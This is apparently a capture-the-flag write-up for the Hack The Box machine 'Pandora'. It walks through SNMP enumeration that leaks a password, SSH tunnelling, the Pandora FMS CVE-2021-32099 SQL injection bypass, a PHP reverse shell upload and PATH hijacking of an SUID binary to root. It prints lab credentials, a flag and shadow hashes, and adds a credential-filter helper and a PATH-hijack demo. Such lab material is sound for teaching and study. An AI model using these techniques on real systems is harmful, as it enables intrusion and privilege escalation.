Highlights
Enumeration with nmap reveals a web service that appears to serve only static pages. A UDP scan reveals SNMP open. Walking the SNMP tree with snmpwalk exposes a running process whose command line contains a user's credentials. Once on the box, we find a second website that is only reachable from localhost. It hosts an open source monitoring system (Pandora FMS) with a known vulnerability; exploiting it gives us a more privileged shell as another user. From there, an SUID binary that calls tar by bare name leads to root through PATH hijacking.
First we start with the nmap scan.
nmap -sV -sC 10.129.252.195
We see that TCP ports 22 (ssh) and 80 (http) are open. Let's check what port 80 gives us.
Navigating the website, everything looks like static pages with no dynamic content. There is a contact form for sending a message to the admins, but submitting it does nothing except refresh the page. There is no robots.txt that might reveal anything juicy either. Maybe there are some interesting hidden directories, so let's fire up gobuster.
gobuster dir -u http://10.129.252.195 -w /usr/share/wordlist/directory-list-2.3-small.txt
Gobuster finds nothing interesting except the /assets directory, which contains the JavaScript, CSS and image files that the main website loads.
Let's try a UDP scan. A default nmap scan only covers TCP, so UDP-only services such as SNMP are easy to miss.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
┌─[puck@parrot-lt]─[~/htb/pandora]
We got one open port, UDP 161 (SNMP). Let's see what it has to offer by running snmpwalk with the public community string. public is the default read-only community on most SNMP deployments, which is why I tried it first; if it doesn't work, the community string has to be brute-forced (for example with onesixtyone or hydra). Note that -v 2c selects SNMPv2c: versions 1 and 2c have no authentication beyond the community string, so anyone who can guess it reads everything the agent exposes.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $snmpwalk -v 2c pandora.htb -c public
snmpwalk returns a lot of detail, but the most interesting part sits under HOST-RESOURCES-MIB hrSWRunParameters (1.3.6.1.2.1.25.4.2.1.5), which lists the command-line arguments of every running process, one row per PID. One process was started with the credentials of the user daniel passed as arguments. Anything on a command line is visible to every local user through /proc and, with this MIB enabled, to anyone holding the community string; secrets belong in a config file or the environment, not in argv.
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
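To make this credential hunt repeatable on a long walk, here is an added shell helper (not part of the original writeup) that filters the hrSWRunParameters rows for arguments that look like a password. It assumes numeric OIDs, which is what snmpwalk prints when no MIBs are loaded, and it does not rejoin lines that a terminal wrapped when the output was copied. The embedded sample is the walk excerpt above, used here as constructed test input; the exclusions in the pattern are what keep snmpd's "-p /run/snmpd.pid" and agetty's "-p --" out of the results.

```shell
#!/bin/sh
# Added example, not from the original writeup: list SNMP hrSWRunParameters
# rows (HOST-RESOURCES-MIB, 1.3.6.1.2.1.25.4.2.1.5.<pid>) whose command-line
# arguments look like they carry a password.
# Assumes numeric OIDs as snmpwalk prints them without MIBs loaded.

# Usage: snmp_cmdline_secrets FILE   (or snmpwalk ... | snmp_cmdline_secrets)
# Output: one "pid<TAB>args" line per suspicious process.
snmp_cmdline_secrets() {
  awk '
    {
      i = index($0, " = "); if (i == 0) next        # continuation/junk line
      oid = substr($0, 1, i - 1); rest = substr($0, i + 3)
      sub(/^iso\./, "1.", oid)                      # snmpwalk writes iso.3.6... for 1.3.6...
      if (oid !~ /^1\.3\.6\.1\.2\.1\.25\.4\.2\.1\.5\.[0-9]+$/) next
      if (rest !~ /^STRING: "/) next                # "" rows carry no arguments
      n = split(oid, o, "."); pid = o[n]
      args = substr(rest, 10); sub(/"$/, "", args)  # strip STRING: "..." wrapper
      # "-p VALUE" counts only when VALUE is neither a path nor another option,
      # which drops snmpd (-p /run/snmpd.pid) and agetty (-p --). The glued
      # mysql form (-pSECRET) is deliberately not matched to avoid -pidfile hits.
      if (args ~ "(^| )(-p|-P|--pass(word|wd)?)(=| +)[^ /-]" ||
          tolower(args) ~ "(password|passwd|pwd|secret|token)=")
        print pid "\t" args
    }' "${1:-/dev/stdin}"
}

# Constructed sample input: the hrSWRunParameters excerpt from this box.
sample_walk() {
  cat <<'EOF'
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
EOF
}

# Stand-alone run: prints only the daniel process.
sample_walk | snmp_cmdline_secrets
```

Against a live target the same function takes the walk directly: `snmpwalk -v 2c -c public pandora.htb 1.3.6.1.2.1.25.4.2.1.5 | snmp_cmdline_secrets`, which also avoids walking the whole tree.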
Let's ssh into the box with the obtained credentials. The user daniel does not have many privileges. Looking at /etc/passwd, there is one other regular user, matt, who might. Looking around the system, we see that along with the static website we saw earlier there is another web app called pandora under the web root. Looking at the Apache sites-enabled config, there seems to be no way to reach it from outside, but making a curl request from localhost on the victim shows something interesting.
It seems only localhost can reach that website. Let's create an SSH tunnel so we can view it from our machine, forwarding local port 80 to port 80 on the target's loopback interface. sudo is needed here only because binding a local port below 1024 requires root; forwarding a high port instead (for example -L 8080:localhost:80) avoids it.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb
daniel@10.10.11.136's password: HotelBabylon23
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information as of Mon 24 Jan 15:07:49 UTC 2022

  System load:  0.37               Processes:             259
  Usage of /:   63.6% of 4.87GB    Users logged in:       1
  Memory usage: 18%                IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28
daniel@pandora:~$
The Pandora console opens and asks for credentials. Common default logins like admin/admin and admin/password don't work. Searching for Pandora tells us it is Pandora FMS, an open source monitoring system, and the version is printed at the bottom of the login page: v7.0NG.742. Searching for exploits specific to this version leads to a very interesting article:
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
This article explains the underlying vulnerabilities in detail. The one we need, CVE-2021-32099, is an unauthenticated SQL injection in the session_id parameter of include/chart_generator.php: the query that looks up the session row can be made to return attacker-chosen session data naming admin as the user, so our own session becomes an admin session without knowing any password. A public PoC automates the bypass:
https://github.com/zjicmDarkWing/CVE-2021-32099
Run it against the tunnelled console, then visit http://127.0.0.1/pandora_console/ and you are logged in as admin.
After logging in as admin, we snoop around a bit and find a file upload option. The application is written in PHP, so let's use the good old php-reverse-shell. We upload the shell, start a listener on port 9000 on our machine and navigate to the uploaded file in the browser:
http://127.0.0.1/pandora_console/images/shell.php
Voila! The web application runs as the user matt, so the reverse shell does too, and we can read user.txt. Great!
We generate an SSH key pair and add the public key to matt's authorized_keys so that we can log in over SSH instead of dealing with the limited reverse shell.
After logging in, the first thing we do is fetch linpeas.sh onto the target. linpeas reports some juicy info, but the most eye-catching item is a binary, /usr/bin/pandora_backup, with the SUID bit set.
Looking at the strings in the binary, we see that it runs tar to write a backup archive under /root/.backup. Since tar is invoked by bare name rather than by absolute path, it is resolved through the caller's PATH, so we can use PATH hijacking to obtain root.
matt@pandora:/$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$
Note the "Permission denied" above: tar could not write under /root, so it was not running as root even though the binary is SUID. That run came from the raw reverse shell spawned by the web server (the echoed commands give it away), and a process tree started with no_new_privs, as hardened service units typically are, makes the kernel ignore SUID bits; this is one more reason to move to SSH. From the SSH session we create a file named tar in matt's home directory containing /bin/bash, prepend that directory to PATH and run the binary. The first attempt below fails with "bin/bash: not found" because the file held just bin/bash: without a shebang or an absolute path, sh runs the file as a script and looks for a relative path bin/bash that does not exist. With /bin/bash as the content, the fake tar runs as root, we get a root shell and the last flag in /root.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $ssh matt@pandora.htb -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information as of Tue 25 Jan 11:48:33 UTC 2022

  System load:  0.27               Processes:             288
  Usage of /:   63.4% of 4.87GB    Users logged in:       1
  Memory usage: 11%                IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

matt@pandora:~$ ls
user.txt
matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/home/matt/tar: 1: bin/bash: not found
Backup failed!
Check your permissions!
matt@pandora:~$ echo $PATH
/home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~$ cat tar
bin/bash
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ cat tar
/bin/bash
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
e50cb013f81c9bb1880dd795ffbaead8
root@pandora:/root# cat /etc/shadow\
> /
cat: /etc/shadow/: Not a directory
root@pandora:/root# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
--snip--
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
root@pandora:/root#
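The privilege escalation above comes down to one line in pandora_backup that names tar without a path. The following added example (not part of the original writeup, and not the box's binary) simulates that mistake next to a hardened version so the difference can be observed without a real SUID binary: everything runs as the current user in a temporary directory, and the hijacked tar only announces itself instead of spawning a shell. The script names, the "HIJACKED" marker and the sanitized PATH value are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the original writeup: PATH hijacking against a
# program that runs "tar" by bare name, beside a version that pins PATH.
# Runs entirely as the current user; no SUID bit is involved.

# Create the demo directory with two "privileged" scripts and a fake tar.
# Prints the directory path.
setup_demo() {
  d=$(mktemp -d) || return 1
  # Victim 1: resolves tar through the caller's PATH, as pandora_backup does.
  cat > "$d/backup_vuln.sh" <<'EOF'
#!/bin/sh
echo "Backup Utility (vulnerable)"
tar -cf /dev/null "$0" 2>/dev/null && echo "backup ok" || echo "backup failed"
EOF
  # Victim 2: pins PATH to trusted directories before running anything, so a
  # directory the caller controls is never searched. Calling /bin/tar by
  # absolute path is the other common fix.
  cat > "$d/backup_fixed.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
echo "Backup Utility (fixed)"
tar -cf /dev/null "$0" 2>/dev/null && echo "backup ok" || echo "backup failed"
EOF
  # Attacker's tar. In the real attack this file holds "/bin/bash" (or
  # "/bin/bash -p" where bash would otherwise drop the effective uid). It must
  # start with a shebang or an absolute path: a bare "bin/bash" is executed as
  # a shell script whose only command is a relative path that does not exist,
  # which is the "bin/bash: not found" error seen in the transcript above.
  cat > "$d/tar" <<'EOF'
#!/bin/sh
echo "HIJACKED: fake tar running as uid $(id -u)"
EOF
  chmod 755 "$d/backup_vuln.sh" "$d/backup_fixed.sh" "$d/tar"
  printf '%s\n' "$d"
}

# Run one victim script with the attacker's directory at the front of PATH,
# mirroring "export PATH=/home/matt:$PATH". Prints the victim's output.
run_with_hijacked_path() {
  PATH="$1:$PATH" "$1/$2"
}

# Stand-alone demonstration.
demo=$(setup_demo)
run_with_hijacked_path "$demo" backup_vuln.sh    # the fake tar runs
run_with_hijacked_path "$demo" backup_fixed.sh   # the real tar runs (or fails cleanly), never the fake
rm -rf "$demo"
```

The fixed variant still works when tar is missing or renamed, it just fails honestly; the vulnerable variant reports "backup ok" because the attacker's tar returned success, which is the same silent outcome a real SUID victim would give while a root shell is spawned on the side.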